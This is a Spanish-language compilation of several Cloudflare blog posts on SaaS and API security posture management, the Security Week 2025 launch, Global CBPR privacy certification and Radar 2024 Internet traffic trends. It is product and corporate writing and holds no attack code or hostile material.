Sin una gestión centralizada de la postura de seguridad, las aplicaciones SaaS pueden parecer el "salvaje oeste" de la seguridad. Contienen una gran cantidad de información confidencial: archivos, bases de datos, espacios de trabajo, diseños, facturas o cualquier recurso que necesite la operativa de tu empresa, pero el control se limita a la configuración del proveedor, lo que te ofrece menos visibilidad y menos opciones de personalización. Además, los miembros del equipo crean, actualizan y eliminan constantemente el contenido que puede causar desviaciones de la configuración y la exposición de los datos, como compartir archivos públicamente, añadir información de identificación personal a bases de datos no conformes o dar acceso a integraciones de terceros. Con Cloudflare, tienes visibilidad de todo tu conjunto de aplicaciones SaaS en un solo panel de control.

Desde la página Información de seguridad de toda la cuenta, puedes consultar la información sobre posibles problemas de seguridad de SaaS:

Puedes elegir detallar más con el agente de seguridad de acceso a la nube (CASB) para una revisión exhaustiva de los errores de configuración, los riesgos y los incumplimientos de las prácticas recomendadas en todo tu conjunto de aplicaciones SaaS. Puedes identificar una gran cantidad de información de seguridad que incluye, entre otros:

• Archivos disponibles públicamente o compartidos externamente

• Aplicaciones de terceros con acceso de lectura o edición

• Acceso de usuarios desconocidos o anónimos

• Bases de datos con credenciales expuestas

• Usuarios sin autenticación en dos fases

• Cuentas de usuario inactivas

También puedes explorar la página Hallazgos de la postura de seguridad, que facilita la búsqueda y la navegación por los documentos almacenados en las aplicaciones SaaS.

Además, puedes crear políticas para evitar desviaciones de la configuración en tu entorno. Las políticas basadas en la prevención ayudan a garantizar una configuración segura y el cumplimiento de las normas, al mismo tiempo que reducen la fatiga de alertas para los equipos de operaciones de seguridad, y estas políticas pueden evitar el movimiento inapropiado o la exfiltración de datos confidenciales. La unificación de los controles y la visibilidad en todos los entornos facilita la protección de las clases de datos regulados, el mantenimiento de registros de auditoría detallados mediante registros y la mejora de la postura de seguridad para reducir el riesgo de fugas.

Para proporcionar información sobre la postura de seguridad de SaaS a nuestros clientes es necesario recopilar grandes cantidades de datos de una amplia gama de plataformas. Para garantizar la seguridad de todos los documentos alojados en tus aplicaciones SaaS (archivos, diseños, etc.), debemos recopilar información sobre su configuración (¿se comparten públicamente?¿aplicaciones de terceros tienen acceso?¿está activada la autenticación multifactor (MFA)? 

Anteriormente realizábamos esta tarea con los rastreadores, que extraían los datos de las API de SaaS. Sin embargo, cuando trabajábamos con conjuntos de datos más grandes teníamos problemas relacionados con los límites de velocidad de los proveedores de SaaS. Esto nos obligaba a trabajar por lotes y a ampliar y acotar el análisis según lo permitieran los proveedores. Esto generaba hallazgos obsoletos y hacía que la corrección fuera engorrosa y poco clara. Por ejemplo, brevemente después de que se eliminaran los permisos, Cloudflare informaba de que se seguía compartiendo públicamente un archivo, lo que generaba confusión para al cliente.

Para solucionar este problema, hemos actualizado nuestro proceso de recopilación de datos para que sea dinámico y en tiempo real, y para que reaccione a los cambios en tu entorno en cuanto se produzcan, ya sea un nuevo hallazgo de seguridad, un activo actualizado o una alerta crítica de un proveedor. Empezamos con nuestros hallazgos de la postura de seguridad y la detección de activos de Microsoft, que te ofrecen información en tiempo real sobre las configuraciones de tu centro de administración de Microsoft, OneDrive, Outlook y SharePoint. En el futuro, ampliaremos rápidamente la compatibilidad a otros proveedores de SaaS.

Cloudflare Workers sirve como punto de entrada para los webhooks de proveedores, y gestiona las notificaciones de cambio de activos de servicios externos. El flujo de trabajo se desarrolla de la siguiente manera:

• Cliente de escucha de webhooks: un Worker inicial actúa como un cliente de escucha de webhooks y recibe los mensajes de cambio de activos de los proveedores.

• Almacenamiento de datos y puesta en cola: al recibir un mensaje, el Worker carga la carga útil sin procesar de la notificación de cambio en Cloudflare R2 para su persistencia, y la publica en una cola de Cloudflare dedicada a los cambios de activos sin procesar.

• Worker de transformación: un segundo Worker, vinculado como consumidor a la cola de cambios de activos sin procesar, procesa los mensajes entrantes. Este Worker transforma los datos sin procesar específicos del proveedor a un formato genérico adecuado para CASB. A continuación, los datos transformados:

  • Se almacenan en Cloudflare R2 para futuras consultas.

  • Se publican en otra cola de Cloudflare, designada para mensajes transformados.

Una vez que los mensajes transformados llegan a la capa CASB, se someten a un procesamiento adicional:

• Consumidor de sondeos: CASB tiene un consumidor que sondea la cola de mensajes transformados. Al recibir un mensaje, determina el controlador relevante necesario para su procesamiento.

• Ejecución del rastreador: el controlador asigna el mensaje a un rastreador apropiado, que interactúa con la API del proveedor para obtener los detalles más actualizados de los activos.

• Almacenamiento de datos: los datos de activos recuperados se almacenan en la base de datos de CASB, lo que garantiza su accesibilidad para las comprobaciones de seguridad y de cumplimiento normativo.

Con esta mejora, ahora procesamos entre 10 y 20 actualizaciones de Microsoft por segundo, o entre 864 000 y 1,72 millones de actualizaciones al día, lo que ofrece a los clientes una visibilidad increíblemente rápida de su entorno. No te pierdas la ampliación a otros proveedores de SaaS en los próximos meses. 

Un desafío exclusivo de la seguridad de las aplicaciones web es que no hay una solución única para todos. Una gestión de la postura de seguridad en función de los activos reduce la distancia entre una solución de seguridad universal y las necesidades empresariales específicas, y ofrece recomendaciones personalizadas para que los equipos de seguridad protejan lo que realmente importa.

A partir de hoy, todos los clientes de Cloudflare tienen acceso a la página Información general sobre seguridad, una nueva página de destino personalizada para cada uno de tus dominios incorporados. Esta página agrega y prioriza las sugerencias de seguridad en todas tus aplicaciones web:

1. Cualquier ataque (en curso) detectado que requiera atención inmediata

2. Disposición (mitigada, entregada por Cloudflare, entregada por origen) de todo el tráfico redireccionado mediante proxy durante los últimos 7 días

3. Resumen de los módulos de seguridad activos actualmente que detectan amenazas

4. Sugerencias sobre cómo mejorar tu postura de seguridad con una guía detallada

5. Y un vistazo a tus reglas de seguridad más activas y actualizadas recientemente

Estas sugerencias de seguridad personalizadas se muestran en función de tu perfil de tráfico y de las necesidades de tu empresa, y esto es posible gracias a la identificación de tus activos web redireccionados mediante proxy.

Muchas aplicaciones web, independientemente de su sector o caso de uso, requieren una funcionalidad similar: la identificación del usuario, la aceptación de la información de pago, etc. Al identificar los activos que proporcionan esta funcionalidad, podemos desarrollar y ejecutar la detección de amenazas específicas para su protección integral.

Por ejemplo, el tráfico de bots dirigido a páginas de marketing no tiene las mismas repercusiones para la empresa que ese mismo tráfico dirigido a las páginas de inicio de sesión. Tus materiales de marketing podrían sufrir la apropiación de contenido, que puede que quieras o no permitir, mientras que el relleno de credenciales en tu página de inicio de sesión merece atención inmediata.

Los activos web se describen mediante una lista de puntos finales; y el etiquetado de cada uno de ellos define sus objetivos empresariales. Un ejemplo sencillo pueden ser las solicitudes POST a la ruta /portal/login, que probablemente describe una API para la autenticación de usuarios. En cambio, las solicitudes GET a la ruta /portal/login indican la página web de inicio de sesión real.

Para la descripción de los objetivos empresariales de los puntos finales entran en juego las etiquetas. Las solicitudes POST al punto final /portal/login que da servicio a los usuarios finales y al punto final /api/admin/login utilizado por los empleados se pueden etiquetar con la misma etiqueta gestionada, cf-log-in, lo que permite a Cloudflare saber que se espera el envío de los nombres de usuario y las contraseñas a estos puntos finales.

Los clientes de API Shield ya pueden utilizar el etiquetado de puntos finales. A principios del segundo trimestre de 2025, añadiremos funciones de descubrimiento y sugerencia de etiquetas, empezando con tres etiquetas ( cf-log-in, cf-sign-up y cf-rss-feed). Todos los demás clientes pueden añadir manualmente estas etiquetas a los puntos finales guardados. Un ejemplo, que se explica a continuación, es evitar la utilización de correos electrónicos desechables durante el registro. 

Los clientes nos han comentado que, con el creciente entusiasmo en torno a la IA generativa, necesitan ayuda para proteger esta nueva tecnología sin obstaculizar la innovación. La capacidad de descubrir servicios basados en LLM permite ajustar los controles de seguridad que son relevantes para esta tecnología en concreto, como inspeccionar las instrucciones, limitar el porcentaje de instrucciones en función del uso de token, etc. En otra publicación del blog de la Security Week explicaremos cómo desarrollamos nuestra solución Firewall for IA y cómo puedes proteger fácilmente tus cargas de trabajo de IA generativa.

La detección del fraude de cuentas, que abarca múltiples vectores de ataque, es otra área clave en la que estamos centrados en 2025.

En muchas páginas de inicio de sesión y de registro se suele utilizar una solución CAPTCHA a fin de permitir el paso solo a los usuarios humanos, suponiendo que los bots son los únicos que realizan acciones no deseadas. Dejando de lado el hecho de que hoy en día la IA puede resolver fácilmente la mayoría de los desafíos CAPTCHA visuales, un enfoque de este tipo no puede resolver eficazmente la causa raíz de la mayoría de los vectores de fraude de cuentas. Por ejemplo, los usuarios que utilizan correos electrónicos desechables para registrar cuentas de un solo uso se benefician de las promociones del registro.

Para resolver este problema de registro fraudulento, se podría implementar una regla de seguridad actualmente en desarrollo como la siguiente, con el objetivo de bloquear todos los intentos que utilicen correos electrónicos desechables como identificador de usuario, sea el solicitante automatizado o no. Todos los puntos finales existentes o futuros con la etiqueta cf-log-in y cf-sign-up están protegidos por esta única regla, ya que ambos requieren la identificación del usuario.

Nuestra solución de detección de amenazas en función del caso de uso, en rápida expansión, se ejecuta por defecto, desde el primer momento en que incorporas tu tráfico a Cloudflare. Los resultados de la detección, disponibles al instante, se pueden consultar mediante el análisis de seguridad, lo que te ayuda a tomar decisiones mejores y más rápido.

Las API tienen su propio conjunto de riesgos y vulnerabilidades, y hoy Cloudflare ofrece siete nuevos análisis de riesgos a través de la gestión de la postura de seguridad de API. Esta nueva función de API Shield te ayuda a reducir el riesgo al identificar los problemas de seguridad y solucionarlos antes de que se produzcan ataques a las API. Dado que las API suelen estar formadas por muchos servicios de backend distintos, los equipos de seguridad deben identificar qué servicio de backend es vulnerable para que los equipos de desarrollo puedan solucionar los problemas identificados.

Nuestros nuevos análisis de riesgos de gestión de la postura de seguridad de API hacen exactamente eso: los usuarios pueden identificar rápidamente qué puntos finales de la API están en riesgo ante una serie de vulnerabilidades, como la exposición de datos confidenciales, el estado de autenticación, los ataques de error de autorización a nivel de objeto (BOLA) y muchas más.

La postura de autenticación es un análisis de riesgos que verás en el nuevo sistema. Para empezar, nos centramos en ella porque los datos confidenciales están en riesgo cuando se supone que se aplica la autenticación de la API, pero esta en realidad no funciona. La postura de autenticación ayuda a los clientes a identificar los errores de configuración para las API y alerta de su presencia. Para ello, se analizan las solicitudes correctas enviadas a la API y se anota su estado de autenticación. API Shield analiza el tráfico a diario y etiqueta los puntos finales de API donde falta la autenticación o esta es mixta para revisarlos posteriormente.

Los clientes que han configurado los ID de sesión en API Shield pueden encontrar las nuevas etiquetas de análisis de riesgos y los detalles de autenticación por punto final en API Shield. Los equipos de seguridad pueden proporcionar esta información a sus equipos de desarrollo para corregir el error de autenticación.

Hoy lanzamos los análisis de la postura de autenticación, los datos confidenciales, las API desprotegidas, los ataques BOLA y el análisis de anomalías para el rendimiento de las API en cuanto a errores, latencia y tamaño de la respuesta.

Para una buena postura de seguridad en un entorno en rápida evolución se requieren soluciones innovadoras que puedan transformar la complejidad en simplicidad. Nuestro primer paso para respaldar los esfuerzos de nuestros clientes para garantizar una postura de seguridad adecuada es combinar la capacidad de evaluación continua de las amenazas y los riesgos en los entornos informáticos públicos y privados a través de una única plataforma.

Para mejorar aún más la relevancia de la información sobre seguridad y las sugerencias proporcionadas y ayudarte a priorizar mejor tus acciones, estamos estudiando la posibilidad de integrar la visión global de Cloudflare del panorama de amenazas. Esto te ofrece perspectivas adicionales, como cuáles representan las mayores amenazas para tu sector y cuáles son los objetivos de los atacantes en este momento. No te pierdas las novedades que lanzaremos este mismo año.

Si aún no lo has hecho, incorpora hoy mismo tus aplicaciones web y SaaS a Cloudflare para obtener información instantánea sobre cómo mejorar la postura de seguridad de tu empresa.

Durante el último año, descubrimos y mitigamos el mayor ataque DDoS jamás registrado en la historia de Internet, en tres ocasiones distintas, lo que subraya los esfuerzos rápidos y persistentes de los ciberdelincuentes. Hemos ayudado a salvaguardar el mayor año de elecciones en todo el mundo, en las que más de la mitad de la población mundial tenía derecho de voto, al mismo tiempo que hemos visto cómo las tensiones geopolíticas y la guerra se reflejaban en el entorno digital.

2025 ya promete seguir el mismo camino, y se estima que este año los ciberataques costarán a la economía mundial 10,5 billones de dólares. Mientras aumenta el rápido avance de la IA y las tecnologías emergentes, y los ciberdelincuentes muestran cada vez una mayor agilidad y creatividad, el panorama de la seguridad sigue evolucionando drásticamente. Las organizaciones afrontan ahora un mayor volumen de ataques y la llegada de amenazas más complejas que tienen consecuencias en el mundo real, como los ciberataques patrocinados por los estados y los ataques a infraestructuras críticas. 

Mi trabajo es proteger a Cloudflare como organización y ayudar a nuestros clientes a ir un paso por delante de los ciberdelincuentes. Si bien en Cloudflare cada semana es una semana dedicada a la seguridad, ha llegado el momento del lanzamiento: ¡de eso se tratan las Semanas de la innovación! ¡Te damos la bienvenida a Security Week 2025!

Como director de seguridad, tengo el privilegio de colaborar con responsables de seguridad de talla mundial que se enfrentan al dinámico panorama normativo y de las amenazas. Gracias a fructíferos intercambios en foros como el Foro Económico Mundial en Davos, RSA y Black Hat, he conocido perspectivas de gran utilidad sobre las dificultades comunes que nos encontramos al abordar las necesidades de seguridad actuales:

• Complejidad: la complejidad se ha convertido en el enemigo de la seguridad. Los equipos tienen dificultades relacionadas con las pilas tecnológicas fragmentadas, los entornos multinube y la continua falta de profesionales de la seguridad. El conocimiento de la situación es limitado, los sistemas dispares aumentan la sobrecarga operativa y la capacidad de modernización supone un desafío.

• Inteligencia artificial: la IA no solo ofrece oportunidades, sino también riesgos. Las organizaciones desean beneficiarse de la IA lo antes posible, y la empiezan a utilizar sin tener tiempo de formar a sus equipos de trabajo sobre cómo mitigar los riesgos específicos que plantea. Se pide a los equipos de seguridad que protejan los modelos de IA para proteger los datos confidenciales y respaldar la estabilidad operativa, todo ello con presupuestos y recursos limitados.

• Puntos ciegos de la seguridad: la superficie de ataque sigue ampliándose. Con el trabajo remoto, la migración a la nube y la aceleración de la transformación digital, los equipos de seguridad tienen dificultades para mantener la visibilidad en entornos cada vez más distribuidos. Esta expansión ha creado puntos ciegos que sofisticados ciberdelincuentes pueden aprovechar rápidamente.

• Proveedores de confianza: los incidentes de seguridad en la cadena de suministro aumentan año tras año. Recientes incidentes de gran repercusión han demostrado cómo las vulnerabilidades de los componentes de terceros pueden propagarse en cascada por el ecosistema digital. Los equipos de seguridad deben tener en cuenta los riesgos que van mucho más allá de su perímetro inmediato, extendiéndose a todas las dependencias de su pila tecnológica.

• Velocidad de detección: se sigue tardando demasiado tiempo en detectar una amenaza en el entorno. A pesar de las inversiones en tecnologías de supervisión y detección, el tiempo medio de permanencia de los atacantes sigue superando los objetivos del sector. Los responsables de seguridad expresan su frustración porque sofisticados ciberdelincuentes pueden operar dentro de las redes sin ser detectados durante largos periodos de tiempo.

Lo que está claro en la comunidad de la seguridad es que el enfoque tradicional de añadir soluciones específicas no es sostenible. Los responsables de seguridad necesitan plataformas integradas que reduzcan la complejidad y ofrezcan protección y visibilidad integrales. Precisamente por ese motivo me incorporé a Cloudflare hace casi dos años: para ayudar a crear soluciones innovadoras para el panorama de amenazas presente y futuro, no para el panorama de amenazas de hace cinco años.

Durante la próxima semana, presentaremos innovaciones que ayudarán a los profesionales de la seguridad a resolver los desafíos que afrontan a diario. Como responsable de la organización de seguridad de Cloudflare, y Cliente Zero, nuestro equipo ha influido en el lanzamiento de las actualizaciones de productos que tendrán lugar esta semana.

Aquí tienes un avance de lo que puedes esperar esta semana:

La informática cuántica cambiará para siempre la seguridad en Internet, sobre todo en el ámbito de la criptografía, que es la forma de proteger las comunicaciones y la información a través de canales como Internet.

A medida que la computación cuántica continúa evolucionando, el trabajo de investigación y desarrollo de la criptografía avanza en paralelo. Confiamos en que con los esfuerzos conjuntos entre el NIST, Microsoft, Cloudflare y otras empresas de computación se logrará una solución sólida y basada en estándares. 

Cloudflare anunciará los avances de su solución Zero Trust nativa de nube y segura desde el punto de vista cuántico, la primera de este tipo. Esto garantiza una seguridad del tráfico de la red corporativa preparada para el futuro y que nuestros clientes pueden adoptar fácilmente. Las actualizaciones que compartirá nuestro equipo de producto redefinirán cómo las empresas y los particulares afrontarán nuestro panorama poscuántico en evolución.

Los programas de seguridad eficaces deben ir varios pasos por delante de las amenazas emergentes. La información sobre amenazas disponible para la mayoría de los equipos de seguridad no tiene contexto, por lo que es difícil reaccionar en consecuencia. 

Esta semana lanzamos nuestra plataforma de eventos de amenazas, que proporciona a nuestros clientes datos de la información sobre amenazas en tiempo real. Gracias al gran alcance de nuestra red, los clientes tendrán una visión integral de las ciberamenazas basada en los ataques que se producen en Internet. 

Este producto permitirá a los usuarios obtener ellos mismos información contextual sobre los ataques que se producen en Internet, mejorando su capacidad para ajustar proactivamente sus defensas y responder a las amenazas emergentes. Como profesionales de la seguridad, no basta con detener las amenazas en la puerta de acceso, tenemos que anticiparnos al siguiente vector. La fuente de eventos de amenazas proporciona esa capa adicional de análisis forense para darnos esa ventaja, analizando quién, cómo y por qué está detrás de cada ataque. Es como realizar una autopsia a las amenazas que neutralizamos, para descubrir patrones, tácticas y posibles debilidades en nuestras defensas que los datos sin procesar por sí solos podrían pasar por alto.

No resulta ninguna sorpresa que la IA sea el principal tema de conversación. La IA es un tema común en todos los sectores, y la principal preocupación es la protección y la seguridad de nuestras inversiones. Como empresa líder en el suministro de infraestructura para el entrenamiento y la inferencia de la IA, nuestros equipos de ingeniería y productos han estado trabajando arduamente para desarrollar una forma de proteger nuestros propios modelos, datos y aplicaciones de IA, así como los de nuestros clientes.

Esta semana, nuestro equipo de producto compartirá cómo nuestros usuarios pueden obtener un mayor control sobre sus datos con nuestro nuevo Firewall for IA y las capacidades mejoradas para nuestro AI Gateway relacionado. El mundo ha pasado de centrarse en la creación de modelos a su implementación activa, y necesitas protegerte contra la explotación de tus datos por parte de terceros para entrenar sus propios sistemas de IA generativa. 

Además, proporcionaremos a los equipos de seguridad visibilidad y protección en todas las aplicaciones web y empresariales desde una única plataforma unificada. Esta nueva función puede identificar la ubicación de todas las aplicaciones en tu organización, comprender las amenazas potenciales correspondientes y proporcionar recomendaciones para la reducción de riesgos.

Más allá de las nuevas herramientas y funciones, la Security Week 2025 representa nuestro compromiso con nuestra misión de ayudar a mejorar Internet.

Lo que distingue a Cloudflare es nuestra posición única en la intersección entre la seguridad y la innovación. Las soluciones que presentamos esta semana no son solo respuestas a las amenazas actuales. Son innovaciones con visión de futuro que se anticipan a los desafíos del mañana. Reflejan nuestra perspectiva de que la seguridad debe evolucionar para pasar de ser reactiva a predictiva, de compleja a intuitiva, y de aislada a integrada.

Las Semanas de la Innovación se han convertido en la piedra angular de nuestra forma de conectar con nuestra comunidad en Cloudflare. Para mí, cada Security Week aporta energía y perspectivas renovadas. Las conversaciones con los clientes, los profesionales de la seguridad y los líderes del sector redefinen continuamente nuestra perspectiva de lo que es posible.

Te invito a que interactúes con nosotros durante toda esta semana, ya sea mediante las demostraciones en directo, los análisis técnicos o las conversaciones directas con nuestro equipo. Espero que salgas no solo con nuevas herramientas, sino con una visión más clara de cómo podemos crear colectivamente una experiencia de Internet más segura para todos.

El futuro de la seguridad no consiste en construir muros más altos, sino en crear ecosistemas más inteligentes. Construyamos ese futuro juntos.

Nuestra participación en Global CBPR y Global PRP se añade a nuestra lista de validaciones de privacidad: fuimos una de las primeras organizaciones de ciberseguridad en certificar la norma internacional de privacidad ISO 27701:2019 cuando se publicó, y en 2022 también obtuvimos la certificación de privacidad en la nube, ISO 27018:2019. En 2023, añadimos nuestra tercera validación de privacidad, revisada por un organismo de supervisión independiente de la Unión Europea (UE) y declarada conforme al primer código de conducta oficial del RGPD: el Código de conducta en la nube de la UE.

En conjunto, Cloudflare demuestra nuestro cumplimiento de las principales validaciones oficiales en materia de privacidad en 39 jurisdicciones de todo el mundo, desde Australia y Austria hasta Suecia y Estados Unidos. Otras cuatro jurisdicciones (Reino Unido, Bermudas, Mauricio y el Centro Financiero Internacional de Dubái) también están en proceso de unirse y reconocer las certificaciones Global CBPR. Esto es importante para los clientes de Cloudflare, ya que garantiza que las prácticas de privacidad que hemos desarrollado cuentan con el reconocimiento de gobiernos de todo el mundo.

En los últimos tres años, gobiernos de todo el mundo han estado preparando dos nuevas normas internacionales de privacidad. El 30 de abril de 2024 se logró un hito importante cuando se instauró el sistema Global CBPR. El sistema CBPR es un sistema voluntario, aplicable, internacional y basado en la responsabilidad que facilita los flujos de datos que respetan la privacidad entre las economías de los miembros. Proporciona un nivel básico de protección de la privacidad de los consumidores gracias a un conjunto de reglas que rigen la gestión de la información personal de las personas. Esto facilita el libre flujo de datos, ya que garantiza la privacidad de los consumidores entre los miembros participantes, a pesar de que cada jurisdicción tenga sus propias leyes individuales de protección de datos.

El sistema CBPR fue desarrollado por Global CBPR Forum, un foro intergubernamental integrado por los gobiernos de Australia, Canadá, Japón, República de Corea, México, Filipinas, Singapur, China Taipéi y Estados Unidos. El Reino Unido también es miembro asociado de CBPR Forum, al igual que Bermudas, Mauricio y el Centro Financiero Internacional de Dubái, lo que indica su intención de unirse como miembros de pleno derecho en el futuro.

Durante el último año, hemos estado ocupados con la preparación del lanzamiento del sistema Global CBPR. El 1 de mayo de 2024, el primer día tras la instauración del sistema, Cloudflare solicitó unirse. Ya hemos alcanzado el importante hito de superar con éxito las auditorías de conformidad con los requisitos, lo que significa que esperamos ser la primera organización del mundo en obtener la nueva certificación del sistema Global CBPR, así como del sistema Global PRP relacionado, cuando las empresas puedan certificarse oficialmente, lo que se espera para este mismo año.

El sistema Global CBPR contiene una lista detallada de cincuenta requisitos que las organizaciones deben cumplir si desean obtener la certificación de este sistema. Los requisitos se derivan de los nueve Principios de privacidad de Global CBPR, coherentes con los principios básicos de las Directrices sobre la protección de la privacidad y los flujos transfronterizos de datos personales de la Organización para la Cooperación y el Desarrollo Económico (OECD). Los cincuenta requisitos abarcan cómo las organizaciones deben recopilar, gestionar y proteger la información personal bajo su custodia. Para obtener la certificación Global CBPR, las organizaciones deben cumplir cada uno de los cincuenta requisitos. Estos son los nueve principios subyacentes de los requisitos:

^{Los nueve principios de privacidad de Global CBPR}

La certificación Global CBPR cubre la gestión de la información personal controlada por la organización, como los datos personales de los clientes, empleados y solicitantes de empleo. En el caso de Cloudflare, esto también incluye la información de la red, es decir, nuestras observaciones sobre cómo nuestra plataforma global en la nube gestiona los datos de los servidores, la red o el tráfico generados por Cloudflare en el transcurso de la prestación de nuestros servicios.

La certificación Global PRP (Privacy Recognition for Processors) aborda la gestión de la información personal que procesa la organización en nombre de otra organización, normalmente su cliente. Los dieciocho requisitos de PRP están relacionados con los dos principios de privacidad más relevantes cuando se procesa esta información en nombre de otra organización: las garantías de seguridad y responsabilidad. Para Cloudflare, esto cubre el tratamiento de datos de conformidad con el Acuerdo de tratamiento de datos (DPA) que firmamos con todos nuestros clientes, principalmente, el Contenido del cliente que fluye a través de nuestra red y los Registros del cliente generados por esos flujos de datos. Para obtener la certificación Global PRP, las organizaciones deben cumplir cada uno de los dieciocho requisitos.

Como se ha señalado, los principales requisitos de los sistemas Global CBPR y Global PRP abarcan los conocidos principios de protección de datos de aviso, elección, limitación de la recopilación (minimización de datos), el derecho de acceso y corrección del interesado, la seguridad adecuada, la prevención de daños, la integridad de la información personal, la responsabilidad y los usos de la información personal. Docenas de requisitos incluyen estos principios, así que aquí solo mencionaremos algunos de ellos.

Veamos primero el principio de aviso. Uno de los requisitos más obvios de CBPR es la pregunta 1:

¿Proporcionas declaraciones claras y fácilmente accesibles sobre tus prácticas y políticas que rigen la información personal descrita anteriormente (una declaración de privacidad)?

La transparencia en la recopilación y el uso de la información personal es un principio clave de la privacidad y la protección de datos, y la transparencia es uno de los compromisos fundamentales de Cloudflare. La documentación de nuestras prácticas y políticas con respecto a cómo utilizamos la información personal permite a los usuarios decidir si desean proporcionar su información, y por eso es una práctica recomendable que el aviso de privacidad esté disponible y visible en el momento de recopilación de la información. De hecho, este concepto de proporcionar un aviso a los usuarios se desprende claramente del artículo 13 del RGPD de la UE. Cloudflare cumple con este requisito de CBPR proporcionando un aviso de privacidad claro y accesible, visible en el pie de todas las páginas de nuestro sitio web. También facilitamos un enlace al aviso cuando recopilamos datos personales, por ejemplo, a través de un formulario en una página web.

En cuanto a cómo utilizamos la información personal, la pregunta 8 plantea:

¿Limitas el uso de la información personal que recopilas (ya sea directamente o mediante el uso de terceros que actúen en tu nombre) tal como se identifica en tu declaración de privacidad?

Hace mucho tiempo que Cloudflare asumió el compromiso de utilizar la información personal que recopilamos únicamente para los fines de nuestros servicios. Nuestro negocio se basa en proporcionar a los clientes las herramientas necesarias para proteger sus aplicaciones de red y mejorar su velocidad, fiabilidad y privacidad. En nuestra Política de privacidad, nos comprometemos a que "solo compartiremos o divulgaremos tu información personal según sea necesario para prestar nuestros Servicios o según se describa de otro modo en esta Política, excepto en los casos en los que primero te lo notifiquemos y tengas la oportunidad de dar tu consentimiento". Además, mantenemos documentación interna (de conformidad con el principio de responsabilidad de CBPR) para documentar los datos que procesamos y los fines con los que los procesamos.

Otros requisitos importantes de los sistemas Global CBPR y Global PRP están relacionados con las garantías de seguridad. La pregunta 27 del requisito CBPR plantea:

¿Puedes describir las medidas de protección físicas, técnicas y administrativas que has implementado para proteger la información personal contra riesgos tales como la pérdida o el acceso no autorizado, la destrucción, el uso, la modificación o la divulgación de información u otros usos indebidos?

En Global PRP, un requisito similar es la pregunta 2: 

¿Puedes describir las medidas de protección físicas, técnicas y administrativas que implementan la política de seguridad de la información de tu organización?

Cloudflare ha implementado un programa de seguridad de la información de acuerdo con la familia de normas ISO/IEC 27000. Los detalles del programa de seguridad de Cloudflare están documentados en el Anexo 2 ("Medidas de seguridad técnicas y organizativas") del Acuerdo de tratamiento de datos de clientes de Cloudflare, incluidas las medidas de protección físicas, técnicas y administrativas implementadas con el fin de proteger la información personal.

En relación con el principio de responsabilidad, la pregunta 46 plantea:

¿Dispones de mecanismos para garantizar que se cumplan tus obligaciones con los usuarios aplicables a procesadores de información personal, agentes, contratistas u otros proveedores de servicios relacionados con la información personal que procesen en tu nombre? 

Cuando tenemos proveedores que gestionan información personal nuestra o de nuestros clientes, les exigimos que firmen un Acuerdo de tratamiento de datos (DPA) con nosotros. Esto garantiza que los compromisos que asumimos para con nuestros clientes en nuestros acuerdos de cliente se transmitan a su vez a nuestros proveedores, incluidos los requisitos de seguridad, haciéndoles, y haciéndonos, responsables.

Estamos entusiasmados con el lanzamiento de las certificaciones Global CBPR, que se espera para este mismo año, y estamos orgullosos de que hoy, Día de la Privacidad de Datos, podamos demostrar una vez más nuestro compromiso con los principios universales para la protección de la privacidad de los datos personales.

Consulta globalcbpr.org si deseas más información sobre los sistemas Global CBPR y Global PRP, descargar una copia completa de los requisitos y estar al día de las noticias relacionadas.

Para obtener información actualizada sobre nuestras certificaciones, visita nuestro Centro de confianza. Los clientes también pueden descubrir cómo descargar una copia de las certificaciones y los informes de Cloudflare desde el panel de control de Cloudflare.

A continuación, presentamos un resumen de las conclusiones clave y luego las analizamos en más detalle en secciones subsiguientes.

• El tráfico global de Internet creció un 17,2 % en 2024. 🔗

• Google mantuvo su posición como el servicio de Internet más popular en general. OpenAI se mantuvo en el primer lugar de la categoría de IA generativa. Binance se mantuvo en el primer lugar de la categoría de criptomonedas. WhatsApp siguió siendo la principal plataforma de mensajería, y Facebook siguió siendo el principal sitio de redes sociales. 🔗

• El tráfico global de Starlink se multiplicó por 3,3 en 2024, de acuerdo con la tasa de crecimiento del año pasado. Después de comenzar a brindar el servicio en Malaui en julio de 2023, el tráfico de Starlink desde ese país se multiplicó por 38 en 2024. Observamos un rápido crecimiento del tráfico en esos lugares a medida que Starlink sumaba nuevos mercados.🔗

• En 2024, Googlebot, el rastreador web de Google, generó el mayor volumen de tráfico hacia Cloudflare, ya que accedió a millones de sitios de clientes de Cloudflare para indexarlos en su motor de búsqueda.🔗

• El tráfico del rastreador de IA de ByteDance (Bytespider) disminuyó gradualmente durante 2024. El rastreador de IA de Anthropic (ClaudeBot) comenzó a mostrar signos de actividad de rastreo en abril, y después de un pico en mayo y junio comenzó a disminuir.🔗

• El 13 % del tráfico TLS 1.3 está utilizando encriptación poscuántica. 🔗

• A nivel mundial, casi un tercio del tráfico de dispositivos móviles fue de Apple iOS. Android tuvo un porcentaje mayor del 90 % del tráfico de dispositivos móviles en 29 países/regiones; el porcentaje pico de tráfico de dispositivos móviles iOS fue de más del 60 %. en ocho países/regiones. 🔗

• A nivel mundial, casi la mitad de las solicitudes web utilizaron HTTP/2, y el 20,5 % utilizó HTTP/3. El uso de ambas versiones aumentó ligeramente con respecto a 2023. 🔗

• React, PHP y jQuery fueron algunas de las tecnologías más populares para crear sitios web, mientras que HubSpot, Google y WordPress se destacaron como proveedores líderes de servicios y plataformas de soporte. 🔗

• Go superó a NodeJS como el lenguaje más popular para llamadas API automatizadas. 🔗

• Google es, sin duda, el motor de búsqueda más popular del mundo, en todas las plataformas. En cuanto a dispositivos móviles y sistemas operativos, Baidu está muy por detrás en segundo lugar. Bing está muy por detrás en segundo lugar entre los dispositivos de escritorio y de Windows, y DuckDuckGo ocupa el segundo lugar como más popular en macOS. Los porcentajes varían según la plataforma y el país/la región. 🔗

• Google Chrome es, sin duda, el navegador más popular en general. Si bien esto también es cierto en los dispositivos macOS, el uso de Safari está muy por delante de Chrome en los dispositivos iOS. En Windows, Edge es el segundo navegador más popular, ya que viene preinstalado y es el navegador predeterminado inicial. 🔗

• Se observaron 225 interrupciones importantes del servicio de Internet en todo el mundo en 2024, y muchas de ellas se debieron a interrupciones a nivel nacional y regional dirigidas por gobiernos. Los cortes de cables y de energía también fueron las principales causas. 🔗

• Durante 2024, 28,5 % de las solicitudes con capacidad para IPv6 de todo el mundo se hicieron en IPv6. India y Malasia fueron los países más fuertes, con un 68,9 % y un 59,6 % de adopción de IPv6, respectivamente. 🔗

• Los 10 principales países clasificados por velocidad de Internet tuvieron velocidades de descarga promedio superiores a 200 Mbps. España estuvo sistemáticamente entre los primeros en cuanto a métricas de calidad de Internet. 🔗

